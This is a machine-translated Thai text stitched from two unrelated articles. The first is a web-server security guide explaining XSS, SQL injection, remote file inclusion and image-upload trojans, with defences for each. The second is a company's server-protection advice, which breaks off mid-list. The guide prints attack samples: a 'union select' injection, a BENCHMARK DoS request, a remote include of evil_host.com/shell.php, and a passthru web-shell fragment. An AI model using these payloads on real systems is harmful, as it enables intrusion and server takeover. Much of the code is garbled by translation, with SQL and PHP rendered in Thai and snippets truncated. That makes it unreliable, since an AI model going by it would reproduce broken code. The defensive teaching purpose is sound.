• ไม่ได้มาตรฐาน. ในยูทิลิตี้แฮ็กเกอร์จำนวนมาก ฐานข้อมูลช่องโหว่ ฟอรัม/, แกลเลอรี/, รูปภาพ/ เส้นทางมักจะกะพริบ สบายมาก! รู้จักผู้ดูแลระบบ ครึ่งหนึ่งจะโกนและถุยน้ำลายบนเว็บไซต์ของคุณเมื่อไซต์ของคุณไม่ได้อยู่ที่ /usr/www และผู้ดูแลระบบของคุณไม่ใช่ site.com/admin สิ่งสำคัญที่สุดคือถ้าคุณไม่ได้มาตรฐาน นี่คือคำพูดเพิ่มเติมในวงล้อของแฮ็กเกอร์ที่โจมตีไซต์ของคุณ เขาจะต้องเพิ่ม / แก้ไขในฐานข้อมูลด้วยตนเอง / สคริปต์ แต่แฮ็กเกอร์สามารถหรือเต็มใจที่จะทำได้หรือไม่? แฮกเกอร์รุ่นเยาว์ "ตัวเล็กสคริปต์" จะต้องกลัวอย่างแน่นอน ตัวอย่างเช่น เคล็ดลับความปลอดภัย PHP

  # ทำให้โค้ด PHP ดูเหมือนโค้ดประเภทอื่น
  แอปพลิเคชัน AddType/x-httpd-php .asp .py .pl
  # ทำให้โค้ด PHP ดูเหมือนรหัสประเภทที่ไม่รู้จัก
  แอปพลิเคชัน AddType/x-httpd-php .bop .foo .133t
  # ทำให้โค้ด PHP ดูเหมือน html
  แอปพลิเคชัน AddType/x-httpd-php .html .htm
  

  รูปแบบการรักษาความปลอดภัยสำหรับ PHP ผ่านการซ่อนนี้มีข้อเสียเล็กน้อยโดยมีค่าใช้จ่ายเพียงเล็กน้อย แฮกเกอร์เองที่อธิบายการแฮ็ก เขียนว่าพวกเขาดาวน์โหลดซอฟต์แวร์เดียวกันที่อยู่บนเซิร์ฟเวอร์ของคุณจากไซต์ของผู้พัฒนา และดูว่าชื่อตารางเริ่มต้น / เส้นทาง / นี่หรือเอ็นจิ้นนั้นใช้งานได้ ความหมายทั่วไปของการไม่เป็นไปตามมาตรฐานคือการชะลอกระบวนการแฮ็กเพื่อให้แฮ็กเกอร์ไม่มี "blitzkrieg" และยิ่งเขาดึงมากเท่าไหร่ก็ยิ่งมีโอกาสถูกตรวจพบมากขึ้นเท่านั้น

• ลบเวอร์ชันของเอ็นจิ้นและสคริปต์บนไซต์. นี่เป็นข้อมูลที่มีค่าที่ผู้โจมตีควรถูกกีดกัน โดยรู้ว่าเวอร์ชันใดที่พวกเขากำลังมองหาโซลูชันสำเร็จรูปสำหรับการแฮ็ก ตรวจสอบให้แน่ใจว่าสคริปต์ของคุณไม่พิมพ์ข้อมูลที่เป็นประโยชน์เกี่ยวกับข้อผิดพลาด เช่น เส้นทางไปยังสคริปต์ที่เกิดข้อผิดพลาด (ปัญหา "การเปิดเผยเส้นทาง") และผลลัพธ์ที่แท้จริงของข้อผิดพลาด
• พิจารณาความจำเป็นของ .htaccess. การมีอยู่ของไฟล์ .htaccess หมายความว่าคุณสามารถแทนที่ตัวเลือกของคุณที่ตั้งไว้ในการกำหนดค่าหลักของ Apache ได้ เชื่อฉันเถอะ แฮกเกอร์จะทำแบบนั้นได้ หากคุณปิดใช้งานการใช้ .htaccess ด้วยคำสั่ง "AllowOverride None" คุณจะได้รับประโยชน์ด้านประสิทธิภาพสำหรับ Apache เนื่องจากจะไม่ตรวจสอบไดเรกทอรีทั้งหมดบนเส้นทางไปยังหน้าเว็บในแต่ละคำขอและเพิ่มความปลอดภัย เว็บเซิร์ฟเวอร์ Apache

ข้อมูลเพิ่มเติมเกี่ยวกับการโจมตีเนื้อหาแบบไดนามิก (เว็บไซต์เป็นกรณีพิเศษ)

• XSS (การเขียนสคริปต์ข้ามไซต์)
  การเขียนสคริปต์ข้ามไซต์เรียกว่า XSS ไม่ใช่ CSS เนื่องจาก CSS เป็นตัวย่อต้นสำหรับ "Cascading Style Sheets" การโจมตี XSS ไม่ได้มุ่งเป้าไปที่เซิร์ฟเวอร์ แต่โจมตีผู้ใช้ของเซิร์ฟเวอร์นั้น แต่แอดมินไม่ต้องปลื้ม! การโจมตี XSS มีลักษณะดังนี้ ไซต์มีฟิลด์ที่แก้ไขได้บนหน้าเว็บหรือพารามิเตอร์สคริปต์ที่ไม่ถูกกรองบนโครงสร้างประเภท<, >จาวาสคริปต์

  แฮ็กเกอร์เพิ่มโค้ดในภาษาการเขียนโปรแกรมฝั่งไคลเอ็นต์ ซึ่งมักจะเป็น Java และ VBScript ลงในฟิลด์ที่แก้ไขได้ และโค้ดนี้จะกลายเป็นส่วนหนึ่งของหน้า HTML เมื่อผู้ใช้เข้าชมหน้าดังกล่าว เบราว์เซอร์จะแยกวิเคราะห์หน้าและรันโค้ดนี้
  แฮกเกอร์ทำอะไรกับ XSS?

  • การขโมยคุกกี้ (คุกกี้ ขนมปัง) - ไฟล์ข้อความเหล่านี้จัดเก็บข้อมูลที่เซิร์ฟเวอร์ "ใส่" ให้กับผู้ใช้เพื่อระบุตัวตนในภายหลัง ในตัวอย่าง หากคุณสร้างไฟล์ test.html ที่มีเนื้อหานี้ (เขียนเอง) จากนั้นเมื่อเรียกใช้ในเบราว์เซอร์ ไฟล์จะส่งออก XSS
    เรียนผู้ดูแลระบบ ฉันมีข้อผิดพลาดในการเข้าชมไซต์
    ช่วย

    แต่คุณสามารถเขียนสคริปต์ใน Java และจริงจังมากขึ้น. โดยปกติ สคริปต์ดังกล่าวจะเขียนไปยังเว็บเมลของผู้ดูแลระบบ และพยายามใช้วิศวกรรมสังคมเพื่อขอให้เขาอ่านข้อความเพื่อรับคุกกี้

    หากไม่มีลิงก์ไปยังที่อยู่ IP และมาตรการรักษาความปลอดภัยเพิ่มเติมในคุกกี้ คุกกี้จะแทนที่คุกกี้ด้วยคุกกี้ผู้ดูแลระบบและพยายามเข้าสู่แผงผู้ดูแลระบบ ซึ่งจะไม่ตรวจสอบการเข้าสู่ระบบและรหัสผ่าน และระบุบุคคลด้วยคุกกี้เท่านั้น

  • การทำให้เว็บไซต์เสียหาย (การทำให้เสียหน้า - การแทนที่หน้าเริ่มต้นของเว็บไซต์ ส่วนใหญ่มักจะเป็น index.html)
  • โทรจันของผู้ใช้ระยะไกล การหาประโยชน์ใหม่ ๆ จะถูกเลือกสำหรับเบราว์เซอร์ของผู้ใช้ และเมื่อพวกเขาเข้าสู่หน้าที่มีช่องโหว่ จะมีการพยายามทำให้คอมพิวเตอร์ติดโทรจันด้วย หากผู้ใช้มีโปรแกรมป้องกันไวรัสที่ติดตั้งฐานข้อมูลใหม่ เขาจะระบุลักษณะที่ปรากฏของโทรจันในระบบ และเว็บไซต์ของคุณจะตกลงไปในสายตาของผู้ใช้บางทีเขาอาจจะไม่มาหาคุณอีก
  • ดอส ด้วยผู้เข้าชมจำนวนมาก สคริปต์จะขอหน้าอื่นเพิ่มเติมจากเซิร์ฟเวอร์ของคุณหรือจากเซิร์ฟเวอร์อื่น อาจมีบางคนมี DoS

  วิธีการแก้:

  • หากต้องการบล็อกการเขียนแท็ก html ไปยังฐานข้อมูลจากช่องป้อนข้อมูล ให้ใช้โครงสร้างเช่น htmlspecialchars สำหรับ PHP ซึ่งจะมาแทนที่< на <, >ถึง >, & ถึง & และอื่นๆ
    ตัวอย่าง,

    $comment = htmlspecialchars($ความคิดเห็น, ENT_QUOTES);
    $query = "แทรกลงในสมุดเยี่ยม
    (ชื่อ ที่ตั้ง อีเมล URL ความคิดเห็น) ค่า
    ("$name", "$location", "$email", "$url", "$comment");
    mysql_query($query) or die(mysql_error());

  • ตรวจสอบและกรองพารามิเตอร์ทั้งหมดที่ผู้ใช้ป้อนในสคริปต์ของคุณและส่งผ่านไปยังสคริปต์ผ่านแถบที่อยู่ เรียนรู้วิธีใช้นิพจน์ทั่วไปอย่างถูกต้องเพื่อแยกวิเคราะห์ข้อมูลขาเข้า สำหรับภาษาการเขียนโปรแกรมของคุณ ให้ค้นหาสื่อการสอนที่สอนวิธีเขียนโค้ดอย่างปลอดภัย
  • หากคุณต้องการใช้เทคโนโลยีคุกกี้ในเว็บไซต์ของคุณ โปรดอ่านแนวทางปฏิบัติด้านความปลอดภัยของคุกกี้ จำกัดการกระทำในเวลาและตามที่อยู่ IP
  • ในฐานะผู้ดูแลระบบ โปรดใช้ความระมัดระวังเมื่อคุณถูกหลอกลวงโดยวิศวกรรมสังคม อย่าลืมเกี่ยวกับความปลอดภัยของคอมพิวเตอร์ส่วนบุคคลที่อยู่เบื้องหลังคอมพิวเตอร์ไคลเอนต์ของคุณ
• การฉีด SQL การฉีด SQL
  โรคนี้หมายความว่าพารามิเตอร์ที่ไม่ได้ตรวจสอบจะถูกแทนที่ในแบบสอบถาม SQL ที่ปรากฏในสคริปต์ แฮ็กเกอร์พบสคริปต์ที่ได้รับผลกระทบจากการฉีด SQL ด้วยวิธีง่ายๆ ใบเสนอราคา site.com/view.php?id=1" จะถูกส่งไปยังค่าพารามิเตอร์ หรือพารามิเตอร์ตัวเลขถูกแก้ไขเช่น site.com/view.php? id=2-1.

  หากใบเสนอราคาที่แทนที่ทำให้เกิด "ข้อผิดพลาด" (ข้อความจำนวนมากที่คำขอดังกล่าวและคำขอดังกล่าวไม่ได้ดำเนินการในสคริปต์ดังกล่าวและตามเส้นทางดังกล่าว) สคริปต์ดังกล่าวจะเป็นตัวเลือกสำหรับการสูบต่อไป บ่อยครั้งที่ผู้โจมตีใช้แฮ็คของ Google โดยถามเครื่องมือค้นหาบางอย่างเช่น "ไซต์: www.victim.ru Warning" เครื่องมือค้นหาของ Google จะส่งคืนสคริปต์ที่ไม่ถูกต้องในไซต์ของคุณ .

  รหัสที่ไม่ตรวจสอบค่าและทนทุกข์ทรมานจากการฉีด SQL

  $id = $_REQUEST["id"];
  $result = mysql_query("เลือกหัวข้อ, ข้อความ, datenews, ผู้เขียนจาก `news' โดยที่ `id`="$id"");
  

  ตอนนี้ลองจินตนาการว่าแทนที่จะเป็นตัวเลข คุณจะถูกแทนที่ "-1 union select null/*" (โดยไม่ใส่เครื่องหมายอัญประกาศ) จากนั้นข้อความค้นหาของคุณจะกลายเป็น

  เลือกหัวเรื่อง, ข้อความ, datenews, ผู้แต่งจาก `news` โดยที่ `id`="-1 union select null/*"
  

  กล่าวคือ แฮ็กเกอร์ต้องการให้คำขอของเขาดำเนินการเพิ่มเติมจากคำขอของคุณ รวมกับคำขอของคุณโดยใช้คำสั่งของสหภาพแรงงาน จากนั้นแฮ็กเกอร์จะพยายามสร้างคำสั่งอื่น ๆ และด้วยพลังของภาษา SQL สิ่งนี้ไม่เป็นลางดีสำหรับผู้ดูแลระบบ จาก deface (deface - แทนที่หน้าเริ่มต้นของไซต์) เพื่อรับสิทธิ์รูทบนเซิร์ฟเวอร์ของคุณ แฮ็กเกอร์ยังสามารถทำการโจมตี DoS ได้ด้วยการฉีด SQL: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) สองสามคำขอดังกล่าวและเซิร์ฟเวอร์อยู่ที่ CPU 100% โหลดเป็นเวลานาน

  การป้องกันการฉีด SQL:

  • ใช้คุณลักษณะของ SQL Server อย่างกว้างขวาง เช่น มุมมองและกระบวนงานที่เก็บไว้ การดำเนินการนี้จะจำกัดการเข้าถึงฐานข้อมูลโดยไม่ได้รับอนุญาต
  • ก่อนที่จะส่งพารามิเตอร์ไปยังคำขอ จะต้องตรวจสอบประเภท (สำหรับ PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() และ is_integer()) และอย่างน้อย อ้างโดยใช้โครงสร้างประเภท addslashes สำหรับ PHP
  • สคริปต์ทั้งหมดทำงานกับฐานข้อมูลจากบัญชีฐานข้อมูลบางบัญชี ลบสิทธิ์ทั้งหมดออกจากบัญชีนี้ที่ไม่จำเป็นสำหรับการทำงาน แฮกเกอร์มักใช้คำสั่ง MySQL (ใช้ MySQL เป็นตัวอย่าง ซึ่งใช้กับเซิร์ฟเวอร์ SQL ใดๆ ก็ได้) "LOAD DATA INFILE" เพื่ออ่านไฟล์ที่ต้องการจากเซิร์ฟเวอร์และบัญชีที่อ่านได้ซึ่ง MySQL กำลังทำงานอยู่ ดังนั้น ข้อสรุป ปิดการใช้งานสิทธิ์ที่ไม่จำเป็นสำหรับสคริปต์ของคุณ เช่น FILE ซึ่งจำเป็นต่อการใช้คำสั่ง LOAD DATA INFILE ควรใช้หลักการของ "ขั้นต่ำพื้นฐาน" เป็นพื้นฐาน
  • บัญชีระบบที่รันเซิร์ฟเวอร์ SQL ไม่ควรเข้าถึงหน้าของไซต์และไฟล์ระบบของเซิร์ฟเวอร์
• การเชื่อมต่อไฟล์ รวมไฟล์. สมมติว่ามีหน้า site.com/getnews.php?file=190607 แต่ผู้เขียนสคริปต์ที่ใช้ include เชื่อมต่อหน้าโดยไม่ต้องตรวจสอบ

  $file = $_REQUEST["file"];
  รวม($file.".html");
  

  แฮ็กเกอร์จะแทนที่ evil_host.com/shell.php แทนที่จะเป็น 190607 จากนั้นแถบที่อยู่ทั้งหมดของเบราว์เซอร์แฮ็กเกอร์จะมีลักษณะดังนี้ site.com/postnews.php?file=evil_host.com/shell.php และแฮ็กเกอร์จะมี เว็บเชลล์ของเขาเองบนไซต์ของคุณด้วยสิทธิ์ที่ Apache มี

  การป้องกันการเชื่อมต่อไฟล์:

  • ตรวจสอบและกรองพารามิเตอร์ทั้งหมดที่ผู้ใช้ป้อนในสคริปต์ของคุณและส่งผ่านไปยังสคริปต์ผ่านแถบที่อยู่ สำหรับภาษาการเขียนโปรแกรมของคุณ ให้ค้นหาสื่อการสอนที่สอนวิธีเขียนโค้ดอย่างปลอดภัย
  • แฮกเกอร์ชอบมันมากเมื่อภาษาการเขียนโปรแกรมบนเว็บไซต์อนุญาตให้คุณเรียกใช้คำสั่งของระบบ ดังนั้น คุณต้องห้ามการเรียกใช้ฟังก์ชันดังกล่าวในภาษาโปรแกรมของคุณ ถ้าเป็นไปได้ ตัวอย่างเช่น ในการตั้งค่า PHP คุณสามารถระบุรายการฟังก์ชัน "ต้องห้าม" โดยใช้ disable_functions ใน php.ini
• ภาพโทรจัน
  หากคุณมีความสามารถในการอัปโหลดไฟล์ไปยังเซิร์ฟเวอร์บนไซต์ ให้เตรียมพร้อมที่จะอัปโหลด เช่น รูปภาพอวาตาร์ ในภาพในรูปแบบ JPEG มีแนวคิดของข้อมูลเมตา (โปรดจำไว้ว่ากล้องเขียนข้อมูลเมื่อถ่ายภาพเฟรม) และข้อมูลเมตานี้จะถูกเขียน

  ";passthru($_GET["cmd"]); echo ""; ?>
  

  รูปภาพจะถูกเปลี่ยนชื่อเป็น avatara.jpg.php เพื่อหลีกเลี่ยงการตรวจสอบส่วนขยายส่วนใหญ่ และจะใช้ site.com/upload_images/avatara.jpg.php?cmd=server_commands

  การป้องกันโทรจัน:

  • ตรวจสอบนามสกุลไฟล์ให้ถูกต้อง แม้ว่าคุณจะประมวลผลไฟล์ที่อนุญาตอย่างถูกต้อง แต่ให้เตรียมพร้อมสำหรับการเปลี่ยนชื่อรูปภาพจาก jpg เป็น php โดยใช้ช่องโหว่อื่นในไซต์ของคุณ ตรวจสอบข้อมูลเมตาในรูปภาพที่มีฟังก์ชันเช่น exif_read_data() ใน PHP
  • ป้องกันการใช้งานภาษาโปรแกรมในไดเร็กทอรีรูปภาพโดยใช้เว็บเซิร์ฟเวอร์ของคุณ ในการทำเช่นนี้ ให้ดูในบรรทัดการกำหนดค่า Apache เช่น "แอปพลิเคชัน AddType/x-httpd-" ซึ่งเชื่อมโยงภาษาการเขียนโปรแกรม​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​ไฟล์​ ห้ามการทำงานด้วยภาพในไดเร็กทอรี สำหรับ Apache การห้ามเรียกใช้ไฟล์ภาษา PHP จะเป็นการสร้าง

    
    คำสั่ง ปฏิเสธ อนุญาต
    ปฏิเสธทั้งหมด
    

  • สำหรับภาษาการเขียนโปรแกรมของคุณ ให้ค้นหาเนื้อหาที่สอนวิธีเขียนโค้ดอย่างปลอดภัยเมื่อประมวลผลภาพและอัปโหลดไปยังเซิร์ฟเวอร์อย่างถูกต้อง

ขอบคุณเป็นการส่วนตัว:

• เพื่อน Alexander Pupyshev aka lynx สำหรับคำวิจารณ์และคำแนะนำ
• เว็บไซต์ antichat.ru/
• www.xakep.ru/
• หนังสือโดย Michael Eben, Brian Taiman การบริหาร FreeBSD: ศิลปะแห่งการทรงตัว
• หนังสือโดย Joel Scambray, Stuart McClure, George Kurtz ความลับของแฮกเกอร์: ความปลอดภัยของเครือข่าย - โซลูชั่นสำเร็จรูป ฉบับที่สอง

แหล่งข้อมูลการป้องกันอื่นๆ:

• หน้า Man Security ของ FreeBSD มีคำอธิบายเกี่ยวกับปัญหาด้านความปลอดภัยทั่วไปและแนวทางปฏิบัติในการดูแลระบบที่ดี
• สมัครสมาชิกรายการส่งเมล freebsd-security @ freebsd.org ในการดำเนินการนี้ ให้ส่งอีเมลไปที่ majordomo @ freebsd.org พร้อมสมัคร freebsd-security ในเนื้อหาของข้อความ อยู่ในรายชื่อผู้รับจดหมายนี้ที่มีการกล่าวถึงปัญหาด้านความปลอดภัยที่เร่งด่วนที่สุด
• หน้าข้อมูลความปลอดภัยของ FreeBSD freebsd.org/security/
• เอกสารวิธีการรักษาความปลอดภัย FreeBSD
• เว็บไซต์ CERT.org มีข้อมูลเกี่ยวกับช่องโหว่ในการป้องกันระบบปฏิบัติการทั้งหมด
• ไฟร์วอลล์และความปลอดภัยทางอินเทอร์เน็ตโดย William R. Cheswick และ Steven M. Bellowin
• การสร้างไฟร์วอลล์อินเทอร์เน็ต รุ่นที่ 2 โดย Brent Chapman และ Elizabeth Zwicky

ผล:
ฉันหวังว่าบทความนี้จะช่วยให้คุณเห็นปัญหาทั้งหมดด้วยกัน ตอนนี้ผู้ดูแลระบบจำเป็นต้องอ่านเกี่ยวกับความปลอดภัยของคอมพิวเตอร์ ฐานข้อมูล เว็บเซิร์ฟเวอร์ ภาษาโปรแกรมจากแหล่งเพิ่มเติม การสรุปบทความโดยสังเขป คุณต้องรับทราบข่าวเกี่ยวกับปัญหาด้านความปลอดภัย อัปเดต และตรวจสอบข้อมูลที่ป้อนเข้าทั้งหมดเพื่อความถูกต้องในการพัฒนาของคุณ
ขอพลังจงอยู่กับท่าน!

เป็นไปไม่ได้ที่จะปกป้องเซิร์ฟเวอร์จากการเข้าถึงภายนอกทุกครั้ง เนื่องจากมีการค้นพบช่องโหว่ใหม่ๆ ทุกวัน และวิธีใหม่ๆ ในการแฮ็กเซิร์ฟเวอร์ก็ปรากฏขึ้น เราจะพูดถึงการปกป้องเซิร์ฟเวอร์จากการเข้าถึงโดยไม่ได้รับอนุญาตในบทความนี้

เซิร์ฟเวอร์ของบริษัทใดๆ ก็ตามสามารถตกเป็นเป้าหมายของการแฮ็กหรือการโจมตีของไวรัสได้ไม่ช้าก็เร็ว โดยทั่วไป ผลของการโจมตีดังกล่าวคือการสูญเสียข้อมูล ชื่อเสียง หรือความเสียหายทางการเงิน ดังนั้นปัญหาด้านความปลอดภัยของเซิร์ฟเวอร์ควรได้รับการแก้ไขตั้งแต่แรก

ควรเข้าใจว่าการป้องกันการแฮ็กเซิร์ฟเวอร์เป็นชุดของมาตรการ รวมถึงมาตรการที่บ่งบอกถึงการตรวจสอบการทำงานของเซิร์ฟเวอร์อย่างต่อเนื่องและทำงานเพื่อปรับปรุงการป้องกัน เป็นไปไม่ได้ที่จะปกป้องเซิร์ฟเวอร์จากการเข้าถึงภายนอกทุกครั้ง เนื่องจากมีการค้นพบช่องโหว่ใหม่ๆ ทุกวัน และวิธีใหม่ๆ ในการแฮ็กเซิร์ฟเวอร์ก็ปรากฏขึ้น

เราจะพูดถึงการปกป้องเซิร์ฟเวอร์จากการเข้าถึงโดยไม่ได้รับอนุญาตในบทความนี้

วิธีและวิธีการในการปกป้องเซิร์ฟเวอร์จากการเข้าถึงโดยไม่ได้รับอนุญาต

การป้องกันทางกายภาพของเซิร์ฟเวอร์

การป้องกันทางกายภาพ เป็นที่พึงประสงค์ว่าเซิร์ฟเวอร์จะตั้งอยู่ในศูนย์ข้อมูลที่ปลอดภัย ห้องปิดและมีการป้องกัน บุคคลภายนอกไม่ควรเข้าถึงเซิร์ฟเวอร์

ตั้งค่าการตรวจสอบสิทธิ์ SSH

เมื่อตั้งค่าการเข้าถึงเซิร์ฟเวอร์ ให้ใช้การรับรองความถูกต้องของคีย์ SSH แทนรหัสผ่าน เนื่องจากคีย์ดังกล่าวยากกว่ามาก และบางครั้งก็ไม่สามารถถอดรหัสได้โดยใช้การค้นหาแบบเดรัจฉาน

หากคุณคิดว่าคุณยังต้องใช้รหัสผ่านอยู่ อย่าลืมจำกัดจำนวนครั้งในการป้อนรหัสผ่าน

ให้ความสนใจถ้าคุณเห็นข้อความเช่นนี้เมื่อคุณเข้าสู่ระบบ:

เข้าสู่ระบบล้มเหลวครั้งล่าสุด: อังคาร 28 ก.ย. 12:42:35 MSK 2017 จาก 52.15.194.10 บน ssh:notty
มีการพยายามเข้าสู่ระบบที่ล้มเหลว 8243 ครั้งนับตั้งแต่การเข้าสู่ระบบที่สำเร็จครั้งล่าสุด

อาจบ่งบอกว่าเซิร์ฟเวอร์ของคุณถูกแฮ็ก ในกรณีนี้ ในการกำหนดค่าความปลอดภัยของเซิร์ฟเวอร์ ให้เปลี่ยนพอร์ต SSH จำกัดรายการ IP ที่สามารถเข้าถึงเซิร์ฟเวอร์ได้ หรือติดตั้งซอฟต์แวร์ที่จะบล็อกกิจกรรมที่น่าสงสัยและบ่อยครั้งมากเกินไปโดยอัตโนมัติ

ติดตั้งอัปเดตล่าสุดเป็นประจำ

เพื่อให้แน่ใจว่ามีการป้องกันเซิร์ฟเวอร์ ติดตั้งแพตช์ล่าสุดและอัพเดตซอฟต์แวร์เซิร์ฟเวอร์ที่คุณใช้ - ระบบปฏิบัติการ ไฮเปอร์ไวเซอร์ เซิร์ฟเวอร์ฐานข้อมูล - ตรงเวลา

ขอแนะนำให้ตรวจสอบแพตช์ใหม่ อัปเดต และรายงานจุดบกพร่อง/ช่องโหว่ทุกวัน เพื่อป้องกันการโจมตีที่ใช้ประโยชน์จากช่องโหว่ซีโร่เดย์ ในการดำเนินการนี้ สมัครรับข่าวสารจากบริษัทพัฒนาซอฟต์แวร์ ติดตามเพจบนโซเชียลเน็ตเวิร์ก

ป้องกันรหัสผ่าน

วิธีทั่วไปในการเข้าถึงเซิร์ฟเวอร์คือการถอดรหัสรหัสผ่านของเซิร์ฟเวอร์ ดังนั้นให้ทำตามคำแนะนำที่รู้จักกันดี แต่ถึงกระนั้นก็มีความเกี่ยวข้องเพื่อไม่ให้เซิร์ฟเวอร์ไม่มีการป้องกัน:

• ห้ามใช้รหัสผ่านที่เดาง่าย เช่น ชื่อบริษัท
• หากคุณยังคงใช้รหัสผ่านเริ่มต้นสำหรับคอนโซลผู้ดูแลระบบ ให้เปลี่ยนทันที
• รหัสผ่านสำหรับบริการต่างๆ จะต้องแตกต่างกัน
• หากคุณต้องการแชร์รหัสผ่านกับผู้อื่น อย่าส่งที่อยู่ IP ข้อมูลเข้าสู่ระบบและรหัสผ่านของคุณในอีเมลหรือข้อความ Messenger เดียวกัน
• คุณสามารถตั้งค่าการยืนยันแบบ 2 ขั้นตอนเพื่อเข้าสู่ระบบบัญชีผู้ดูแลระบบ

ไฟร์วอลล์

• ตรวจสอบให้แน่ใจว่าเซิร์ฟเวอร์มี กำหนดค่า และทำงานอยู่ตลอดเวลา
• ปกป้องทั้งการรับส่งข้อมูลขาเข้าและขาออก
• ติดตามว่าพอร์ตใดเปิดอยู่และเพื่อจุดประสงค์ใด อย่าเปิดสิ่งใดเป็นพิเศษเพื่อลดจำนวนช่องโหว่ที่เป็นไปได้สำหรับการแฮ็กเซิร์ฟเวอร์

โดยเฉพาะอย่างยิ่ง ไฟร์วอลล์มีประโยชน์มากในการปกป้องเซิร์ฟเวอร์จากการโจมตี ddos ​​เพราะ คุณสามารถสร้างกฎการบล็อกไฟร์วอลล์และเพิ่มที่อยู่ IP ที่การโจมตีมาจาก หรือบล็อกการเข้าถึงบางแอปพลิเคชันโดยใช้โปรโตคอลบางอย่าง

การตรวจสอบและการตรวจจับการบุกรุก

• จำกัดซอฟต์แวร์และบริการที่ทำงานบนเซิร์ฟเวอร์ของคุณ ตรวจสอบทุกสิ่งที่คุณใช้งานอยู่เป็นระยะ และหากพบกระบวนการที่ไม่คุ้นเคย ให้ลบออกทันทีและเริ่มตรวจหาไวรัส
• ตรวจสอบสัญญาณของการปลอมแปลงเป็นระยะ การแฮ็กอาจมีหลักฐานยืนยันจากบัญชีผู้ใช้ใหม่ที่คุณไม่ได้สร้าง ย้าย หรือลบไฟล์ /etc/syslog.conf, ไฟล์ที่ถูกลบ /etc/shadowและ /etc/passwrd .
• ตรวจสอบเซิร์ฟเวอร์ของคุณ จับตาดูความเร็วและปริมาณงานปกติ เพื่อให้คุณสังเกตเห็นความเบี่ยงเบนได้ เช่น เมื่อภาระบนเซิร์ฟเวอร์มีมากกว่าปกติมาก

การใช้การเข้ารหัส VPN และ SSL/TLS

หากจำเป็นต้องเข้าถึงเซิร์ฟเวอร์จากระยะไกล จะต้องได้รับอนุญาตจากที่อยู่ IP บางที่อยู่เท่านั้นและดำเนินการผ่าน VPN

ขั้นตอนต่อไปในการรับรองความปลอดภัยสามารถตั้งค่า SSL ซึ่งจะไม่เพียงเข้ารหัสข้อมูล แต่ยังตรวจสอบตัวตนของผู้เข้าร่วมรายอื่นในโครงสร้างพื้นฐานเครือข่ายด้วยการออกใบรับรองที่เหมาะสมให้กับพวกเขา

การตรวจสอบความปลอดภัยของเซิร์ฟเวอร์

จะเป็นความคิดที่ดีที่จะตรวจสอบความปลอดภัยของเซิร์ฟเวอร์โดยอิสระโดยใช้วิธีเพนเทส เช่น การจำลองการโจมตีเพื่อค้นหาช่องโหว่ที่อาจเกิดขึ้นและกำจัดให้ทันเวลา ขอแนะนำให้ใช้ผู้เชี่ยวชาญด้านความปลอดภัยของข้อมูลเข้าร่วม อย่างไรก็ตาม การทดสอบบางอย่างสามารถทำได้โดยอิสระโดยใช้โปรแกรมแฮ็กเซิร์ฟเวอร์

มีอะไรอีกที่คุกคามเซิร์ฟเวอร์นอกเหนือจากการแฮ็ค

เซิร์ฟเวอร์สามารถล่มได้ด้วยเหตุผลหลายประการนอกเหนือจากการถูกแฮ็ก ตัวอย่างเช่น อาจเป็นการติดมัลแวร์หรือเพียงความล้มเหลวทางกายภาพของส่วนประกอบอย่างใดอย่างหนึ่ง

ดังนั้น มาตรการในการปกป้องเซิร์ฟเวอร์ควรรวมถึง:

• การติดตั้งและอัปเดตโปรแกรมเพื่อป้องกันเซิร์ฟเวอร์ - แอนติไวรัส
• สำเนาข้อมูลที่เข้ารหัสเป็นประจำอย่างน้อยสัปดาห์ละครั้งเพราะตามสถิติฮาร์ดไดรฟ์ของเซิร์ฟเวอร์อยู่ในอันดับแรกในแง่ของความถี่ของการพังทลาย ตรวจสอบให้แน่ใจว่าข้อมูลสำรองถูกเก็บไว้ในสภาพแวดล้อมที่ปลอดภัยทางกายภาพ
• ตรวจสอบให้แน่ใจว่าได้จ่ายไฟไปยังห้องเซิร์ฟเวอร์อย่างต่อเนื่อง
• การป้องกันเซิร์ฟเวอร์ทางกายภาพอย่างทันท่วงที รวมถึงการทำความสะอาดจากฝุ่นและการเปลี่ยนแผ่นระบายความร้อน

ประสบการณ์ของผู้เชี่ยวชาญของ Integrus บอกเราว่าการป้องกันภัยคุกคามดังกล่าวที่ดีที่สุดคือการใช้แนวทางปฏิบัติที่ดีที่สุดในระบบการป้องกันเซิร์ฟเวอร์

เพื่อให้มั่นใจในความปลอดภัยของเซิร์ฟเวอร์ของลูกค้า เราใช้เครื่องมือหลายอย่างร่วมกัน: ไฟร์วอลล์ โปรแกรมป้องกันไวรัส เทคโนโลยีความปลอดภัย / การจัดการเหตุการณ์ (SIM / SEM) เทคโนโลยีการตรวจจับการบุกรุก / การป้องกันการบุกรุก (IDS / IPS) เทคโนโลยีการวิเคราะห์พฤติกรรมเครือข่าย (NBA) แน่นอนเซิร์ฟเวอร์บำรุงรักษาเชิงป้องกันปกติและการจัดห้องเซิร์ฟเวอร์ที่ปลอดภัยบนพื้นฐานแบบเบ็ดเสร็จ วิธีนี้ช่วยให้คุณลดความเสี่ยงจากการถูกแฮ็กหรือเซิร์ฟเวอร์ล้มเหลวได้ด้วยเหตุผลอื่นๆ

เราพร้อมที่จะดำเนินการตรวจสอบความปลอดภัยเซิร์ฟเวอร์ของบริษัทของคุณ ปรึกษาผู้เชี่ยวชาญ ดำเนินการงานทุกประเภทในการตั้งค่าการป้องกันอุปกรณ์เซิร์ฟเวอร์

คำแนะนำสั้น ๆ สำหรับการปรับใช้เครือข่ายป้องกันไวรัส:

1. จัดทำแผนสำหรับโครงสร้างของเครือข่ายป้องกันไวรัส รวมถึงคอมพิวเตอร์และอุปกรณ์มือถือที่ได้รับการป้องกันทั้งหมด

